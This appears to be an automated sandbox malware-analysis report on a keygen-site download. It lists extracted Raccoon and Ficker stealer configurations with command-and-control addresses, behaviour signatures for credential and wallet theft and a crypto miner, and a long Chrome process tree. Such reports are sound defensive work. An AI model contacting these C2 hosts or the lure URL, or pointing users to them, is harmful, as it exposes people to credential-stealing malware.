Analysis

  • max time kernel
    165s
  • max time network
    238s
  • platform
    windows10_x64
  • resource
    win10v20210410
  • submitted
    23-04-2021 19:22

Errors

Reason
Machine shutdown

General

Malware Config

Extracted

Family

raccoon

Botnet

562d987fd49ccf22372ac71a85515b4d288facd7

Attributes
  • url4cnc

    https://telete.in/j90dadarobin

rc4.plain
rc4.plain

Extracted

Family

fickerstealer

C2

212.64.215.73:81

sodaandcoke.top:80

Signatures

  • Azorult

    An information stealer that was first discovered in 2016, targeting browsing history and passwords.

  • DcRat

    DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • fickerstealer

    Ficker is an infostealer written in Rust and ASM.

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

  • XMRig Miner Payload 1 IoCs
  • Creates new service(s) 1 TTPs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 1 IoCs
  • Executes dropped EXE 27 IoCs
  • Modifies Windows Firewall 1 TTPs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 8 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 3 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 4 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 3 IoCs
  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of SetThreadContext 6 IoCs
  • Drops file in Program Files directory 12 IoCs
  • Drops file in Windows directory 1 IoCs
  • Launches sc.exe

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 9 IoCs
  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 2 IoCs
  • Download via BitsAdmin 1 TTPs 1 IoCs
  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Kills process with taskkill 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 3 IoCs
  • Modifies data under HKEY_USERS 13 IoCs
  • Modifies registry class 64 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Runs ping.exe 1 TTPs 4 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: MapViewOfSection 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 14 IoCs
  • Suspicious use of SetWindowsHookEx 5 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s Browser
    1⤵
      PID:2856
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s WpnService
      1⤵
        PID:2804
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
        1⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:2796
      • C:\Program Files\Google\Chrome\Application\chrome.exe
        "C:\Program Files\Google\Chrome\Application\chrome.exe" https://keygenit.com/d/9472d2406f110qn26n09.html
        1⤵
        • Enumerates system info in registry
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of WriteProcessMemory
        PID:3164
        • C:\Program Files\Google\Chrome\Application\chrome.exe
          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xc8,0xcc,0xd0,0xa4,0xd4,0x7ffd6cb64f50,0x7ffd6cb64f60,0x7ffd6cb64f70
          2⤵
            PID:808
          • C:\Program Files\Google\Chrome\Application\chrome.exe
            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1548,7090589221919091170,9915335291491330145,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1596 /prefetch:2
            2⤵
              PID:1804
            • C:\Program Files\Google\Chrome\Application\chrome.exe
              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1548,7090589221919091170,9915335291491330145,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=1668 /prefetch:8
              2⤵
              • Suspicious behavior: EnumeratesProcesses
              PID:1996
            • C:\Program Files\Google\Chrome\Application\chrome.exe
              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1548,7090589221919091170,9915335291491330145,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2156 /prefetch:8
              2⤵
                PID:2548
              • C:\Program Files\Google\Chrome\Application\chrome.exe
                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1548,7090589221919091170,9915335291491330145,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2772 /prefetch:1
                2⤵
                  PID:2828
                • C:\Program Files\Google\Chrome\Application\chrome.exe
                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1548,7090589221919091170,9915335291491330145,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2792 /prefetch:1
                  2⤵
                    PID:1320
                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1548,7090589221919091170,9915335291491330145,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3352 /prefetch:1
                    2⤵
                      PID:2192
                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1548,7090589221919091170,9915335291491330145,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3464 /prefetch:1
                      2⤵
                        PID:2484
                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1548,7090589221919091170,9915335291491330145,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3528 /prefetch:1
                        2⤵
                          PID:1468
                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1548,7090589221919091170,9915335291491330145,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3548 /prefetch:1
                          2⤵
                            PID:3376
                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1548,7090589221919091170,9915335291491330145,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4812 /prefetch:8
                            2⤵
                              PID:4564
                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1548,7090589221919091170,9915335291491330145,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6088 /prefetch:8
                              2⤵
                                PID:4744
                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1548,7090589221919091170,9915335291491330145,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6068 /prefetch:8
                                2⤵
                                  PID:4768
                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1548,7090589221919091170,9915335291491330145,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6356 /prefetch:8
                                  2⤵
                                    PID:4848
                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1548,7090589221919091170,9915335291491330145,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6072 /prefetch:8
                                    2⤵
                                      PID:4884
                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1548,7090589221919091170,9915335291491330145,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6648 /prefetch:8
                                      2⤵
                                        PID:4920
                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1548,7090589221919091170,9915335291491330145,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6736 /prefetch:8
                                        2⤵
                                          PID:4956
                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1548,7090589221919091170,9915335291491330145,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6876 /prefetch:8
                                          2⤵
                                            PID:4968
                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1548,7090589221919091170,9915335291491330145,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6964 /prefetch:8
                                            2⤵
                                              PID:5028
                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1548,7090589221919091170,9915335291491330145,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7020 /prefetch:8
                                              2⤵
                                                PID:5040
                                              • C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe
                                                "C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe" --configure-user-settings --verbose-logging --system-level --channel --force-configure-user-settings
                                                2⤵
                                                  PID:5076
                                                  • C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe
                                                    "C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\Crashpad --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0x224,0x21c,0x218,0x220,0x248,0x7ff769dea890,0x7ff769dea8a0,0x7ff769dea8b0
                                                    3⤵
                                                      PID:3976
                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1548,7090589221919091170,9915335291491330145,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5728 /prefetch:8
                                                    2⤵
                                                    • Suspicious behavior: EnumeratesProcesses
                                                    PID:4248
                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1548,7090589221919091170,9915335291491330145,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3584 /prefetch:8
                                                    2⤵
                                                      PID:4360
                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1548,7090589221919091170,9915335291491330145,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6688 /prefetch:8
                                                      2⤵
                                                        PID:3892
                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1548,7090589221919091170,9915335291491330145,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6088 /prefetch:8
                                                        2⤵
                                                          PID:4588
                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1548,7090589221919091170,9915335291491330145,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6252 /prefetch:8
                                                          2⤵
                                                            PID:4628
                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1548,7090589221919091170,9915335291491330145,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5036 /prefetch:8
                                                            2⤵
                                                              PID:3220
                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1548,7090589221919091170,9915335291491330145,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6368 /prefetch:8
                                                              2⤵
                                                                PID:4808
                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1548,7090589221919091170,9915335291491330145,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6640 /prefetch:8
                                                                2⤵
                                                                  PID:4608
                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1548,7090589221919091170,9915335291491330145,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6648 /prefetch:8
                                                                  2⤵
                                                                    PID:4568
                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1548,7090589221919091170,9915335291491330145,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6532 /prefetch:8
                                                                    2⤵
                                                                      PID:4260
                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1548,7090589221919091170,9915335291491330145,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5744 /prefetch:8
                                                                      2⤵
                                                                        PID:5084
                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1548,7090589221919091170,9915335291491330145,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6104 /prefetch:8
                                                                        2⤵
                                                                          PID:4864
                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1548,7090589221919091170,9915335291491330145,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5324 /prefetch:8
                                                                          2⤵
                                                                            PID:4956
                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1548,7090589221919091170,9915335291491330145,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5552 /prefetch:8
                                                                            2⤵
                                                                              PID:5060
                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1548,7090589221919091170,9915335291491330145,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5520 /prefetch:8
                                                                              2⤵
                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                              PID:5028
                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1548,7090589221919091170,9915335291491330145,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5592 /prefetch:8
                                                                              2⤵
                                                                                PID:500
                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1548,7090589221919091170,9915335291491330145,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7172 /prefetch:8
                                                                                2⤵
                                                                                  PID:5020
                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1548,7090589221919091170,9915335291491330145,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5560 /prefetch:8
                                                                                  2⤵
                                                                                    PID:900
                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1548,7090589221919091170,9915335291491330145,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7412 /prefetch:8
                                                                                    2⤵
                                                                                      PID:4576
                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1548,7090589221919091170,9915335291491330145,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7560 /prefetch:8
                                                                                      2⤵
                                                                                        PID:5032
                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1548,7090589221919091170,9915335291491330145,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7676 /prefetch:8
                                                                                        2⤵
                                                                                          PID:4852
                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1548,7090589221919091170,9915335291491330145,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7708 /prefetch:8
                                                                                          2⤵
                                                                                            PID:4876
                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1548,7090589221919091170,9915335291491330145,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7720 /prefetch:8
                                                                                            2⤵
                                                                                              PID:4428
                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1548,7090589221919091170,9915335291491330145,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7732 /prefetch:8
                                                                                              2⤵
                                                                                                PID:4792
                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1548,7090589221919091170,9915335291491330145,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7736 /prefetch:8
                                                                                                2⤵
                                                                                                  PID:4480
                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1548,7090589221919091170,9915335291491330145,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7764 /prefetch:8
                                                                                                  2⤵
                                                                                                    PID:5156
                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1548,7090589221919091170,9915335291491330145,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7776 /prefetch:8
                                                                                                    2⤵
                                                                                                      PID:5192
                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1548,7090589221919091170,9915335291491330145,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7788 /prefetch:8
                                                                                                      2⤵
                                                                                                        PID:5228
                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1548,7090589221919091170,9915335291491330145,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8804 /prefetch:8
                                                                                                        2⤵
                                                                                                          PID:5312
                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1548,7090589221919091170,9915335291491330145,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=50 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5484 /prefetch:1
                                                                                                          2⤵
                                                                                                            PID:5352
                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1548,7090589221919091170,9915335291491330145,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=51 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4120 /prefetch:1
                                                                                                            2⤵
                                                                                                              PID:5416
                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1548,7090589221919091170,9915335291491330145,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=52 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3972 /prefetch:1
                                                                                                              2⤵
                                                                                                                PID:5488
                                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.FileUtilService --field-trial-handle=1548,7090589221919091170,9915335291491330145,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8608 /prefetch:8
                                                                                                                2⤵
                                                                                                                  PID:5552
                                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1548,7090589221919091170,9915335291491330145,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=8364 /prefetch:8
                                                                                                                  2⤵
                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                  PID:5600
                                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1548,7090589221919091170,9915335291491330145,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5628 /prefetch:8
                                                                                                                  2⤵
                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                  PID:5660
                                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1548,7090589221919091170,9915335291491330145,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5204 /prefetch:8
                                                                                                                  2⤵
                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                  PID:5772
                                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1548,7090589221919091170,9915335291491330145,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3780 /prefetch:8
                                                                                                                  2⤵
                                                                                                                    PID:5820
                                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1548,7090589221919091170,9915335291491330145,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5380 /prefetch:8
                                                                                                                    2⤵
                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                    PID:5832
                                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1548,7090589221919091170,9915335291491330145,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1428 /prefetch:8
                                                                                                                    2⤵
                                                                                                                      PID:5912
                                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1548,7090589221919091170,9915335291491330145,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4108 /prefetch:8
                                                                                                                      2⤵
                                                                                                                        PID:5956
                                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1548,7090589221919091170,9915335291491330145,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.15063.0 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=976 /prefetch:2
                                                                                                                        2⤵
                                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                                        PID:6040
